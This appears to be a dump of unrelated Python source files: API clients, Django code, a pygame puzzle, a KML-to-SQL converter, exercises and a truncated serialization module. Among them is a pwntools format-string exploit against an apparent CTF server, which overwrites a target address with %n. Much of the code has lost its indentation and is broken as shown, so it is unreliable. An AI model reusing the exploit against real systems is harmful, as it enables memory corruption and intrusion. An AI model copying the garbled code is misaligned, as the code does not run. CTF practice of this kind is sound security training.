def request(self, entity, method, entityId=None, params=None, data=None):
if not self.logged_in:
            if not self.login():
                raise AuthenticationError(errors="login failed")
_method = method.lower()
json_payload = data
if _method == "get":
if entityId:
url = '%s/%s/%s' % (self.base_url, entity, entityId)
else:
url = '%s/%s' % (self.base_url, entity)
response = requests.get(url, headers=self.headers, params=params)
elif _method == "post":
response = requests.post('%s/%s' % (self.base_url, entity), headers=self.headers, data=json.dumps(json_payload))
elif _method == "put":
response = requests.put('%s/%s/%s' % (self.base_url, entity, entityId), headers=self.headers, data=json.dumps(json_payload))
#print response.url
return response.json()
def ListWebHooks(self, page=None):
        return self.request('hooks', 'get')
def CreateWebHook(self, action, entity, name, url, **kwargs):
payload = {"action": action, "entity": entity, "name": name, "url": url}
for key, value in kwargs.items():
payload[key] = value
        return self.request('hook', 'post', data=payload)
def ListAccounts(self, page=None, where=None, order=None):
return self.request('accounts', 'get', params={"where": where})
def RetrieveAccount(self, account_id):
return self.request('accounts', 'get', entityId=account_id)
def UpdateAccount(self, account_id, data):
return self.request('accounts', 'put', entityId=account_id, data=data)
def CreateAccount(self, data):
return self.request('accounts', 'post', data=data)
def ListSales(self, page=None, where=None, order=None):
return self.request('sales', 'get')
def RetrieveSale(self, sale_id):
return self.request('sales', 'get', entityId=sale_id)
def ListProducts(self, page=None, where=None, order=None):
return self.request('products', 'get')
def RetrieveProduct(self, product_id):
return self.request('products', 'get', entityId=product_id)
def CreateProduct(self, model, **kwargs):
data = {"model": model,}
for key, value in kwargs.items():
data[key] = value
return self.request('products', 'post', data=data) |
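A short usage sketch of the client above; the credentials are placeholders:

# Hypothetical usage with placeholder credentials.
client = Client()
client.api_key = "YOUR_API_KEY"
client.private_key = "YOUR_PRIVATE_KEY"
accounts = client.ListAccounts()  # logs in automatically on first request
print(accounts)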
## A is the input Array(Unsorted)
A = [64, 25, 12, 22, 11]
for i in range(len(A)):
min_idx = i
for j in range(i+1, len(A)):
if A[min_idx] > A[j]:
min_idx = j
A[i], A[min_idx] = A[min_idx], A[i]
## A is now the sorted array
## This will print the array elements line by line
print("Sorted array")
for i in range(len(A)):
print(A[i])
|
# -*- coding: utf-8 -*-
from providerModules.a4kScrapers import core
class sources(core.DefaultSources):
def __init__(self, *args, **kwargs):
super(sources, self).__init__(__name__, *args, single_query=True, **kwargs)
self._filter = core.Filter(fn=self._filter_fn, type='single')
def _filter_fn(self, title, clean_title):
if self.is_movie_query():
return False
if self.scraper.filter_single_episode.fn(title, clean_title):
self._filter.type = self.scraper.filter_single_episode.type
return True
if self.scraper.filter_single_special_episode.fn(title, clean_title):
self._filter.type = self.scraper.filter_single_special_episode.type
return True
if self.scraper.filter_show_pack.fn(title, clean_title):
self._filter.type = self.scraper.filter_show_pack.type
return True
if self.scraper.filter_season_pack.fn(title, clean_title):
self._filter.type = self.scraper.filter_season_pack.type
return True
return False
def _get_scraper(self, title):
return super(sources, self)._get_scraper(title, custom_filter=self._filter)
def _search_request(self, url, query):
query = core.quote_plus(self._imdb)
response = self._request.get(url.base + (url.search % query))
if response.status_code != 200:
return []
try:
results = core.json.loads(response.text)
except Exception as e:
self._request.exc_msg = 'Failed to parse json: %s' % response.text
return []
if len(results) == 0 or results[0]['id'] == '0':
return []
else:
return results
def _soup_filter(self, response):
return response
def _title_filter(self, el):
return el['name']
def _info(self, el, url, torrent):
torrent['hash'] = el['info_hash']
torrent['size'] = int(el['size']) / 1024 / 1024
torrent['seeds'] = el['seeders']
return torrent
def movie(self, title, year, imdb=None):
self._imdb = imdb
return super(sources, self).movie(title, year, imdb, auto_query=False)
def episode(self, simple_info, all_info):
self._imdb = all_info.get('info', {}).get('tvshow.imdb_id', None)
if self._imdb is None:
self._imdb = all_info.get('showInfo', {}).get('ids', {}).get('imdb', None)
return super(sources, self).episode(simple_info, all_info)
|
import pyblish.api
class ValidateRigModelSubset(pyblish.api.InstancePlugin):
"""Get model subset from Geometry group.
"""
label = "Validate Model Subset Data"
order = pyblish.api.ValidatorOrder + 0.13
hosts = ["maya"]
families = [
# "reveries.rig",
"reveries.rig.skeleton"
]
def process(self, instance):
import maya.cmds as cmds
from reveries.maya.usd import rig_prim_export
if not instance.data.get("publishUSD", True):
return
geometry_path = "|ROOT|Group|Geometry"
if not cmds.objExists(geometry_path):
raise RuntimeError(
"{}: Get geometry group failed. It should be {}".format(
instance, geometry_path))
validator = rig_prim_export.RigPrimValidation()
model_subset_data = validator.get_model_subset_data()
invalid_group = validator.get_invalid_group()
model_data = {
"model_data": model_subset_data,
"invalid_group": invalid_group
}
if not validator.validation_result or not model_subset_data:
for log in validator.validation_log:
self.log.error(log)
raise Exception("Model subset data validation failed.")
if model_subset_data:
instance.data["model_subset_data"] = model_data
# instance.data["model_subset_data"] = model_subset_data
|
from pickle import load
from pickle import dump
from os.path import isdir
from os import makedirs
root = 'C:/Users/Ritik/Desktop/2021 Autumn Semester/Assignments/AI/'
pickledtraindata = open(root+'filtered_data/train.pickle',mode='rb')
data = load(pickledtraindata)
pickledtraindata.close()
def put(val,dic):
if val in dic:
dic[val] += 1
else:
dic[val] = 1
droot = root+'classifiers/v2/'
if not isdir(droot): makedirs(droot)
wtwtd = dict()
for x1 in data:
for x2 in x1:
for x3 in x2:
for x4 in x3:
for x5 in x4:
prv = None,None
for x6 in x5:
if x6[0] != 'mw':
put((x6[2],x6[1],prv[0],prv[1]),wtwtd)
prv = x6[2],x6[1]
else:
w = ''
for j in range(len(x6[2])):
x7 = x6[2][j]
if j != 0:
w += x7[2]+' '
put((x7[2],x7[1],prv[1],prv[0]),wtwtd)
wt = (w[:-1],x6[1])
put((wt[1],wt[0],prv[0],prv[1]),wtwtd)
prv = wt
pickledtraindict = open(droot+'train.pickle',mode='wb')
dump(wtwtd,pickledtraindict)
pickledtraindict.close() |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from base import BaseObject
class ConfidenceLevelPostProcessor(BaseObject):
def __init__(self,
some_analyses: list,
is_debug: bool = False):
"""
Create:
7-Apr-2017
craig.trim@ibm.com
* refactored out of svc:ComputeConfidenceLevels
Updated:
17-Jul-2019
craig.trim@ibm.com
* migrated from abacus-att
git@github.ibm.com:abacus-implementation/abacus-att.git
:param some_analyses:
"""
BaseObject.__init__(self, __name__)
self.analyses = some_analyses
self.is_debug = is_debug
def get_max_confidence(self):
"""
:return: the maximum confidence among all analysis results
"""
max_confidence = 0
for analysis in self.analyses:
if analysis["confidence"] > max_confidence:
max_confidence = analysis["confidence"]
return max_confidence
def fit_curve(self):
"""
Purpose:
poor-mans sigmoid curve fitting
Example:
given four analysis results with these confidence levels
[115, 100, 80, 10]
normalize to
[100, 85, 65, 0]
note how the delta is computed from the highest result
delta = -15
and the delta is deducted from each result
:return: normalized confidence levels
"""
# determine the delta
max_confidence = self.get_max_confidence()
        delta = 0
        if max_confidence > 100:
            delta = max_confidence - 100
# deduct the delta from each analysis object
for analysis in self.analyses:
analysis["confidence"] -= delta
# no confidence level shall be lower than 0
if analysis["confidence"] < 0:
analysis["confidence"] = 0
def tie_break(self):
"""
Purpose:
for two equal flows,
gives a boost to the flows with the most "include-all-of" tags
:return:
"""
max_confidence = self.get_max_confidence()
for analysis in self.analyses:
if max_confidence != analysis["confidence"]:
continue
total_include_all_of = len(analysis["analysis"]["include_all_of"]["total"])
analysis["confidence"] += total_include_all_of * 5
def process(self):
self.tie_break()
self.fit_curve()
return self.analyses
|
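A worked example of the processing order above (tie_break first, then fit_curve); the input mirrors the fit_curve docstring and assumes the base module's BaseObject is importable:

# Hypothetical analyses: the top entry also has two include-all-of tags.
analyses = [
    {"confidence": 115, "analysis": {"include_all_of": {"total": ["a", "b"]}}},
    {"confidence": 100, "analysis": {"include_all_of": {"total": []}}},
    {"confidence": 80, "analysis": {"include_all_of": {"total": []}}},
    {"confidence": 10, "analysis": {"include_all_of": {"total": []}}},
]
proc = ConfidenceLevelPostProcessor(analyses)
result = proc.process()
# tie_break lifts 115 -> 125; fit_curve then subtracts delta=25 everywhere:
print([a["confidence"] for a in result])  # [100, 75, 55, 0]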
# Generated by Django 3.1.4 on 2020-12-14 10:48
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('system', '0002_transaction_amount'),
]
operations = [
migrations.AddField(
model_name='transaction',
name='date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 12, 14, 11, 48, 47, 480330)),
),
]
|
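Note that the default=datetime.datetime(2020, 12, 14, ...) above was evaluated once when makemigrations ran, so every new row gets that fixed timestamp. If a per-row creation time was intended, the usual fix is a callable default on the model field; a sketch under that assumption (this is the model, not the migration, and the amount field is a placeholder):

# Hypothetical model definition with a callable default,
# evaluated at save time rather than at makemigrations time.
from django.db import models
from django.utils import timezone

class Transaction(models.Model):
    amount = models.DecimalField(max_digits=10, decimal_places=2)  # placeholder field
    date = models.DateTimeField(blank=True, default=timezone.now)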
from src import common, utils
from src.Engine.Reusable.button import Button
from src.Engine.Reusable.dropdowns import DropDown
from src.Engine.objects import game_data
from src.Engine.base import BaseSidebar
class DefaultSidebar(BaseSidebar):
def __init__(self, screen=common.SCREEN):
super().__init__(screen)
self.nodetype_select = DropDown((common.GRID_WIDTH + 10, 80), 150, 40, ["Test", "Worn Down Road"], (128, 128, 128),
"Road", 19, (0, 0, 0), (128, 128, 128), (140, 140, 140), (150, 150, 150),
(100, 100, 100), 5)
self.nodetype_select.bind_on_selection(game_data.game_state.on_nodetype_select_selection)
def handle_events(self, event):
self.nodetype_select.handle_event(event)
def draw(self):
self.nodetype_select.draw()
class NodeInfoSidebar(BaseSidebar):
    def __init__(self, screen=common.SCREEN, *args, **kwargs):
        super().__init__(screen)
        self.node_pos = kwargs.get('node_pos')  # may be None if not supplied
        self.node = args[0]
self.exit_button = Button(
self.screen, (common.GRID_WIDTH + 10, common.GRID_HEIGHT - 50, 180, 40),
lambda: self.change_sidebar(DefaultSidebar),
(128, 128, 128), "Exit Properties", (0, 0, 0), 15, False, (100, 100, 100), 5,
(150, 150, 150), False
)
def handle_events(self, event):
self.exit_button.handle_event(event)
def draw(self):
title_txt = utils.load_font(15).render(f"Properties of Node {self.node_pos}:", True, (0, 0, 0))
self.screen.blit(
title_txt, (common.GRID_WIDTH + 10, 80)
)
        traffic_txt = utils.load_font(20).render(
            f"Traffic: {self.node.properties['traffic']}",  # renders 'None' when unset
            True, (0, 0, 0)
        )
self.screen.blit(
traffic_txt, (common.GRID_WIDTH + 10, 120)
)
type_txt = utils.load_font(20).render(
f"Node Type: {self.node.type.name.replace('_', ' ')}",
True, (0, 0, 0)
)
self.screen.blit(
type_txt, (common.GRID_WIDTH + 10, 150)
)
self.exit_button.draw()
|
def notas(*n, sit=False):
    """
    -> Function that computes the grades and standing of several students.
    :param n: the students' grades
    :param sit: optional flag indicating whether to show the class standing
    :return: dictionary with assorted information about the class.
    """
    d = {}
    d['total'] = len(n)
    d['maior'] = max(n)
    d['menor'] = min(n)
    d['media'] = sum(n) / len(n)
    if sit:
        if d['media'] >= 7:
            d['situação'] = 'BOA'
        elif 5 <= d['media'] < 7:
            d['situação'] = 'RAZOÁVEL'
        else:
            d['situação'] = 'RUIM'
    return d
resp = notas(3, 6, 10, 6.5, sit=True)
print(resp)
help(notas) |
# https://leetcode.com/problems/sum-of-digits-in-base-k/
class Solution:
    def sumBase(self, n: int, k: int) -> int:
        # peel off base-k digits with repeated modulo and sum them directly
        sumx = 0
        while n > 0:
            sumx += n % k
            n = n // k
        return sumx
|
#!/usr/bin/env python
from pwn import *
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10092
context.arch = "i386"
context.os = "linux"
e = ELF("bin")
SYM = e.symbols["target"]
PTR = p32(SYM)
POS = 7
s = remote(SERVER, PORT)
# Classic format-string write: the target address sits on the stack at
# positional argument POS, and %n writes the number of bytes printed so far
# to it. Encode the format string so it can be concatenated with the bytes PTR.
s.sendline(PTR + "%{}$n".format(POS).encode())
print(s.recvuntil(b"}"))
s.close()
|
import pygame
import random
from mini_game_class import MiniGame
class Button:
def __init__(self, click_area, row, column):
self.click_area = click_area
self.row = row
self.column = column
def was_clicked(self, mouse_position):
return self.click_area.collidepoint(*mouse_position)
class Game(MiniGame):
def __init__(self, location):
super().__init__(location)
self.size = self.settings['size']
self.tile_size = 900 // self.size
self.tiles = self.load_tiles()
self.grid = self.create_grid()
self.shuffle_tiles(5)
self.buttons = None
    def create_grid(self):
        grid = []
        for row in range(self.size):
            grid.append([])
            for column in range(self.size):
                grid[row].append(row * self.size + column)
        grid[1][1] = None  # starting empty cell
        return grid
def load_tiles(self):
image = pygame.image.load(f'{self.location.image_path}puzzle.png')
result = []
for row in range(self.size):
for column in range(self.size):
x = column * self.tile_size
y = row * self.tile_size
tile = image.subsurface([x, y, self.tile_size, self.tile_size])
result.append(tile)
return result
def get_empty_cell(self):
for row in range(self.size):
for column in range(self.size):
if self.grid[row][column] is None:
return row, column
def create_buttons(self):
buttons = []
row, column = self.get_empty_cell()
for row_offset, column_offset in [(1, 0), (-1, 0), (0, 1), (0, -1)]:
r = row + row_offset
c = column + column_offset
if r < 0 or c < 0 or r >= self.size or c >= self.size:
continue
buttons.append(Button(
pygame.Rect(c * self.tile_size, r * self.tile_size, self.tile_size, self.tile_size),
r,
c
))
return buttons
def draw(self):
self.canvas.fill('Black')
for row in range(self.size):
for column in range(self.size):
tile_number = self.grid[row][column]
if tile_number is None:
continue
tile = self.tiles[tile_number]
self.canvas.blit(tile, (column * self.tile_size, row * self.tile_size))
if not self.done:
self.buttons = self.create_buttons()
return self.canvas
def swap_tiles(self, row, column):
empty_row, empty_column = self.get_empty_cell()
self.grid[empty_row][empty_column] = self.grid[row][column]
self.grid[row][column] = None
def check_completion(self):
for row in range(self.size):
for column in range(self.size):
cell = self.grid[row][column]
if cell is not None and cell != row * self.size + column:
return
empty_row, empty_column = self.get_empty_cell()
self.grid[empty_row][empty_column] = empty_row * self.size + empty_column
self.game_completion()
    def handle_mouse_event(self, mouse_event):
        if mouse_event.type == pygame.MOUSEBUTTONUP and self.buttons:
mouse_position = self.location.mini_game_mouse_pos()
for button in self.buttons:
if button.was_clicked(mouse_position):
self.swap_tiles(button.row, button.column)
self.check_completion()
return
def swap_random(self):
empty_row, empty_column = self.get_empty_cell()
while True:
            row_offset, column_offset = random.choice([(1, 0), (-1, 0), (0, 1), (0, -1)])
r = empty_row + row_offset
c = empty_column + column_offset
if r < 0 or c < 0 or r >= self.size or c >= self.size:
continue
self.swap_tiles(r, c)
break
def shuffle_tiles(self, times):
for _ in range(times):
self.swap_random()
|
# -*- coding:utf8 -*-
from pykml import parser
def showGeometry(geometry):
    # KML coordinates are space-separated "lon,lat,alt" triplets
    pts = geometry.strip().split(' ')
    newPts = []
    for pt in pts:
        pt = pt.split(",")
        if len(pt) == 3:
            newPts.append(" ".join(pt[0:2]))
    coords = ",".join(newPts)
    if not coords:
        return None
    return coords
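# Example of the transformation performed by showGeometry (illustrative):
#   "-50.17,-29.47,0 -50.18,-29.56,0"  ->  "-50.17 -29.47,-50.18 -29.56"
# i.e. KML "lon,lat,alt" triplets become the "lon lat" pairs used by WKT.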
# <Polygon>
# <altitudeMode>relativeToGround</altitudeMode>
# <outerBoundaryIs>
# <LinearRing>
# <coordinates>
# -50.17550771979931,-29.4754907335555,0 -50.1755081692913,-29.565491050911,0 -50.2655089152286,-29.5654907063369,0 -50.26550846507681,-29.4754903899313,0 -50.17550771979931,-29.4754907335555,0 -50.17550771979931,-29.4754907335555,0
# </coordinates>
# </LinearRing>
# </outerBoundaryIs>
# </Polygon>
def showPolygon(poly):
geom = showGeometry(str(poly.getchildren()[-1].getchildren()[-1].getchildren()[-1]))
    if geom is None:
return geom
return "POLYGON(("+geom+"))"
# <LineString>
# <coordinates>
# -55.95887672133307,-30.27547919965932,0 -55.95937522386026,-30.27560741069645,0 -55.95985636281911,-30.27552481691735,0 -55.96038405557332,-30.27551124009514,0 -55.96090726939379,-30.27558169345586,0 -55.96142445128812,-30.27557154540634,0
# </coordinates>
# </LineString>
def showLineString(line):
geom = showGeometry(str(line.getchildren()[-1]))
    if geom is None:
return geom
return "LineString("+geom+")"
# <Placemark>
# <name>UAR 1 - UAP1</name>
# <visibility>0</visibility>
# <open>1</open>
# <styleUrl>#m_ylw-pushpin1400</styleUrl>
# <Polygon>
# ...
# </Polygon>
# </Placemark>
def showPlaceMark(place):
polygon = name = None
for f in place.getchildren():
if f.tag.endswith("name"):
# print f
name = str(f.text.encode("utf-8")).strip("\n").strip()
# print name
if f.tag.endswith("MultiGeometry"):
children = []
for ff in f.getchildren():
if ff.tag.endswith("Polygon"):
children.append(showPolygon(ff))
if ff.tag.endswith("LineString"):
children.append(showLineString(ff))
            if len(children) == 1:
                polygon = children[0]
            else:
                typ = children[0][:children[0].find("(")].upper()
                flag = True
                for c in children:
                    if not c.upper().startswith(typ):
                        flag = False
                        break
                if flag:
                    # homogeneous parts: strip the type prefix and wrap
                    # them in the matching MULTI* container
                    children = [c[c.find("("):] for c in children]
                    if typ == "POINT":
                        polygon = "MULTIPOINT("+",".join(children)+")"
                    elif typ == "LINESTRING":
                        polygon = "MULTILINESTRING("+",".join(children)+")"
                    elif typ == "POLYGON":
                        polygon = "MULTIPOLYGON("+",".join(children)+")"
                else:
                    # mixed geometry types cannot share a MULTI* container
                    polygon = "GEOMETRYCOLLECTION("+",".join(children)+")"
if f.tag.endswith("Polygon"):
polygon = showPolygon(f)
if f.tag.endswith("LineString"):
polygon = showLineString(f)
    if polygon is not None:
print "INSERT INTO UnidadeGeografica (Nome,shape,Data_Criacao, idProjeto,idPesquisador) VALUES (\""+ name+ "\",", "GeomFromText(\"",polygon,"\")", ",","NOW()",",1,1);"
def expand(folder):
for f in folder.getchildren():
if f.tag.endswith("Folder") or f.tag.endswith("Document"):
# print f.name.text.encode("utf-8")
expand(f)
if f.tag.endswith("Placemark"):
showPlaceMark(f)
# else:
# print f.tag
kml = parser.parse("Grades_Parcelas_PPBIO26Ago2015.kml")
#kml = parser.parse("SISBIOTA_UAR_UAP_UAL_16122014.kml")
root = kml.getroot()[0].getchildren()[-1].getchildren()[-1]
expand(root)
|
from django.contrib import admin
from django.urls import path
from app import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home),
path('about/', views.about, name='about'),
path('contact/', views.contact, name='contact'),
path('dashboard/', views.dashboard, name='dashboard'),
path('signup/', views.user_signup, name='signup'),
path('login/', views.user_login, name='login'),
path('logout/', views.user_logout, name='logout'),
path('addpost/', views.add_post, name='addpost'),
path('updatepost/<int:id>/', views.update_post, name='updatepost'),
path('delete/<int:id>/', views.delete_post, name='deletepost'),
]
|
def run() -> int:
sum_of_squares = sum(x ** 2 for x in range(1, 101))
square_of_sums = sum(range(1, 101)) ** 2
return square_of_sums - sum_of_squares
if __name__ == '__main__':
print(f'Difference of the sum of the squares and square of the sums of the first 100 natural numbers: {run()}') |
'''serialize/deserialize almost any kind of python object'''
# TODO:
# memoryview -- not possible? .tolist or .tobytes will return the data, but i haven't found a way to get the object that it references
# bytearray -- use str() to get the data
# operator.methodcaller -- can be done by using an object with __getattr__ for the name, and grabbing the method's *args, **kwds for the default args. hopefully doing this doesn't influence state...
# TODO: add a decorator that can transform anything into an object that will pass an instance of self
# to serialization service
import sys
if sys.version_info.major < 3:
    import __builtin__ as builtins
    import types
else:
    import builtins, types
__all__ = ['caller', 'pack', 'unpack', 'loads', 'dumps']
VERSION = '0.7'
## FIXME: none of these are enabled due to their hackiness, search for XXX
# attribute[ignore=list of fu type names] -- ignore serializing/deserializing these types
# attribute[globals=dict] -- use the provided dict as the globals for deserialized objects
# attribute[exclude=list of var names] -- ignore serializing/deserializing these specific names
# attribute[local=list of module names] -- use the local versions of these modules
# attribute[recurse={type name : [list of types]}] -- only recurse into these types from this type
# attribute[norecurse={type name : [list of types]}] -- don't recurse into these types from this type
########
class package:
'''
This class is responsible for exposing the interface used to marshal/unmarshal
    an object. The reason for the class is to close over the internals of this
    module, hiding the machinery that is used for serialization. The only
interfaces that are exposed are the pack() and unpack() classmethods.
'''
@classmethod
def pack(cls, object, **attributes):
'''convert any python object into a packable format'''
st = cls.stash()
id = st.store(object, **attributes)
return VERSION, id, st.packed()
@classmethod
def unpack(cls, data, **attributes):
'''unpack data into a real python object'''
ver, id, data = data
if ver != VERSION:
raise AssertionError('fu.package.unpack : invalid version %s != %s'%(ver, VERSION))
st = cls.stash()
st.unpack(data)
return st.fetch(id, **attributes)
### stuff that's hidden within this namespace
class cache(object):
'''
This class is used to handle the registration of the different serializers
and deserializers for a python type/constant. The registration of the
different implementations is done via decorator at which point one can
use the .by*() classmethods to identify the handler for their type or
instance.
'''
class registration:
id, const, type = {}, {}, {}
@staticmethod
def hash(data):
agg = 5381
for item in iter(data):
agg = (((agg<<5) + agg) ^ ord(item)) & 0xffffffff
return agg
## registration of a cls into cache
@classmethod
def register(cls, definition):
id = cls.registration.hash(definition.__name__)
#id = definition.__name__
if id in cls.registration.id:
raise KeyError("Duplicate id %x in cache"% id)
cls.registration.id[id] = definition
definition.id = id
return definition
@classmethod
def register_type(cls, definition):
'''registers the definition with the specified builtin type'''
type = definition.getclass()
if type in cls.registration.type:
raise KeyError("Duplicate type %r in cache"% type)
definition = cls.register(definition)
cls.registration.type[type] = definition
return definition
@classmethod
def register_const(cls, definition):
const = definition.getclass()
if const in cls.registration.const:
raise KeyError("Duplicate constant %r in cache"% const)
definition = cls.register(definition)
cls.registration.const[const] = definition
return definition
## determining a registered cls from various types
@classmethod
def byid(cls, id):
            '''search through registration.id for a definition'''
return cls.registration.id[id]
@classmethod
def byclass(cls, type):
'''search through registration.type for a definition'''
return cls.registration.type[type]
@classmethod
def byconst(cls, const):
'''search through registration.const for a definition'''
result = cls.registration.const[const]
if result.getclass() is not const:
raise KeyError(const)
return result
@classmethod
def byinstance(cls, instance):
'''iterate through all registered definitions to determine which one can work for serialization/deserialization'''
global package, object_, module_
type, object, module = types.TypeType if sys.version_info.major < 3 else builtins.type, types.ObjectType if sys.version_info.major < 3 else builtins.object, types.ModuleType
t = type(instance)
# any constant
try:
return package.cache.byconst(instance)
except (KeyError, TypeError):
pass
# special types
if t is module and instance is not module:
# XXX: implement binary modules
if hasattr(instance, '__file__'):
if instance.__file__.endswith('.pyd'):
raise NotImplementedError('Binary modules are un-supported')
return module_
return module_local
# by type
try:
return package.cache.byclass(t)
except (KeyError, TypeError):
pass
# builtins for known-modules that can be copied from
if t == builtin_.getclass():
if instance.__module__ is None:
#return incomplete # XXX
raise KeyError(instance, 'Unable to determine module name from builtin method')
return builtin_
# catch-all object
if hasattr(instance, '__dict__') or hasattr(instance, '__slots__'): # is this an okay assumption?
return object_
# FIXME: if it follows the pickle protocol..
if hasattr(instance, '__getstate__'):
raise NotImplementedError('Pickle protocol for type %r is unimplemented'% instance)
                # unreachable round-trip fallback, kept for reference:
                #pickle.loads(pickle.dumps(instance))
                #return incomplete
raise KeyError(instance)
class stash(builtins.object):
'''
This class is used to recursively serialize/deserialize an instance or
type. It is temporarily constructed and will use the cache to identify
how to serialize/deserialize the data that is passed to it. Once all
the references are processed, a tuple of the objects and constants are
then returned. This can then be re-packed into a bytestream which can
then be transported wherever the user needs it.
'''
def __init__(self):
# cache for .fetch
self.fetch_cache = {}
self.store_cache = builtins.set()
# caches for .store
self.cons_data = {}
self.inst_data = {}
@staticmethod
def clsbyid(item): return package.cache.byid(item)
@staticmethod
def clsbyinstance(item): return package.cache.byinstance(item)
# FIXME: should prolly implement __str__, __unicode__, and __repr__
def __repr__(self):
cons = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.cons_data.items()]
inst = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.inst_data.items()]
return "<class '%s'> %s"%(self.__class__.__name__, builtins.repr({key : item for key, item in cons}))
## serializing/deserializing entire state
def packed(self):
return self.cons_data, self.inst_data
def unpack(self, data):
cons, inst = data
self.cons_data.clear()
self.inst_data.clear()
self.cons_data.update(cons)
self.inst_data.update(inst)
return True
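        # A packed stash is just these two dictionaries, each mapping an
        # object's identity to a (type-id, data) pair. Roughly, for a packed
        # [5] (identities shown symbolically; real keys come from id()):
        #   cons_data ~ {list_id: (list_.id, ()), five_id: (int_.id, 5)}
        #   inst_data ~ {list_id: (list_.id, (five_id,)), five_id: (int_.id, ())}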
## packing/unpacking of id's
def pack_references(self, data, **attributes):
'''converts object data into reference id's'''
if data.__class__ is ().__class__:
return ().__class__(self.store(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.store(k, **attributes) : self.store(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
# a list contains multiple packed objects
return [self.pack_references(item, **attributes) for item in data]
return data
def unpack_references(self, data, **attributes):
'''converts packed references into objects'''
if data.__class__ is ().__class__:
return ().__class__(self.fetch(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.fetch(k, **attributes) : self.fetch(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
return [self.unpack_references(item, **attributes) for item in data]
return data
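        # Illustrative behavior: tuples and dicts of objects are converted
        # element-wise into identity ids via store()/fetch(), while a list is
        # assumed to already hold packed entries and is recursed into rather
        # than stored; unpack_references() is the exact inverse.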
def identify(self, object):
return id(object)
# unique id generator for .identify if id is not guaranteed to be unique (python 2.6?)
#if not hasattr(self, '__identity'):
# self.__identity = []
#if object in self.__identity:
# return self.__identity.index(object)
#self.__identity.append(object)
#return self.identify(object)
def __getitem__(self, name):
return self.identify(name)
### stashing/fetching of objects
def store(self, object, **attributes):
identity = self.identify(object)
if identity in self.store_cache:
return identity
cls = self.clsbyinstance(object)
if False: # XXX: if we want to make the module and name part of the protocol. (for assistance with attributes)
# get naming info
modulename, name = getattr(object, '__module__', None), getattr(object, '__name__', None)
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# store constructor info
data = cls.p_constructor(object, **attributes)
self.store_cache.add(identity)
data = self.pack_references(data, **attributes)
self.cons_data[identity] = cls.id, data
# self.cons_data[identity] = cls.id, (modulename, name), data # XXX: for attributes by name
# recurse into instance data
data = cls.p_instance(object, **attributes)
data = self.pack_references(data, **attributes)
self.inst_data[identity] = cls.id, data
return identity
def fetch(self, identity, **attributes):
if identity in self.fetch_cache:
return self.fetch_cache[identity]
# unpack constructor
# _, (modulename, name), data = self.cons_data[identity] # XXX: for attributes by name
_, data = self.cons_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
if False: # XXX: attributes
# naming info
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
instance = incomplete.new()
self.fetch_cache[identity] = instance
return instance
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# create an instance of packed object
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
# update instance with packed attributes
_, data = self.inst_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError('%s.fetch(%d) : constructed instance is different from updated instance'% (builtins.object.__repr__(self), identity))
return instance
class __type__(builtins.object):
'''
This base class is used to help register an instance of a type. Once
identifying the type of an instance, the class will be responsible for
returning any attributes that are necessary to re-construct or
re-instantiate that object.
'''
@classmethod
def getclass(cls, *args, **kwds):
'''
        This returns the type to search for. The type is taken from an
        instance via its __class__ attribute.
'''
raise NotImplementedError(cls)
@classmethod
def new(cls):
'''
This method returns an instance of the type that the class is supposed
to be responsible for.
'''
return cls.getclass()
@classmethod
def repr(cls, object):
'''
This method will output an instance in a readable manner.
'''
return repr(object)
@classmethod
def p_constructor(cls, object, **attributes):
'''
        This method will extract any attributes that are required to create
the initial instance of a type. The necessary attributes are then
returned as a tuple.
'''
return ()
@classmethod
def p_instance(cls, object, **attributes):
'''
This method will extract any attributes that will be updated after
the type has been instantiated. It is prudent to note that these
attributes are not necessary to construct the object, only that the
object's users expect these fields to be set. The necessary attributes
are then returned as a tuple.
'''
raise NotImplementedError(cls)
@classmethod
def u_constructor(cls, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and use it to re-instantiate the specified type. The tuple in data is
the same as the tuple returned by the p_constructor() classmethod. The
method will return the properly instantiated type.
'''
raise NotImplementedError(cls)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and do whatever is necessary to update the instance parameter with it.
This can include (but is not limited to), assigning any attributes with
the setattr() keyword, calling any methods to update the state, etc.
The tuple in data corresponds to the tuple returned by the p_instance()
classmethod. The method will then return the instance that was updated.
'''
return instance
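# Illustrative sketch of the handler protocol above, for a hypothetical
# user-defined class MyType (not part of this module):
#
#     @package.cache.register_type
#     class mytype_(__type__):
#         @classmethod
#         def getclass(cls): return MyType
#         @classmethod
#         def p_constructor(cls, object, **attributes): return (object.arg,)
#         @classmethod
#         def u_constructor(cls, data, **attributes): return cls.getclass()(*data)
#         @classmethod
#         def p_instance(cls, object, **attributes): return ()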
@package.cache.register_type
class incomplete(__type__):
'''just a general type for incomplete objects'''
class partialinstance(object):
__name__ = '--incomplete--'
def __getattr__(self, attribute):
message = 'unable to access attribute "%s" from incomplete type "%s"'
raise Exception(message% (attribute, self.__name__))
def __call__(self, *args, **kwds):
message = 'unable to call incomplete type "%s"'
raise Exception(message% (self.__name__))
def __repr__(self):
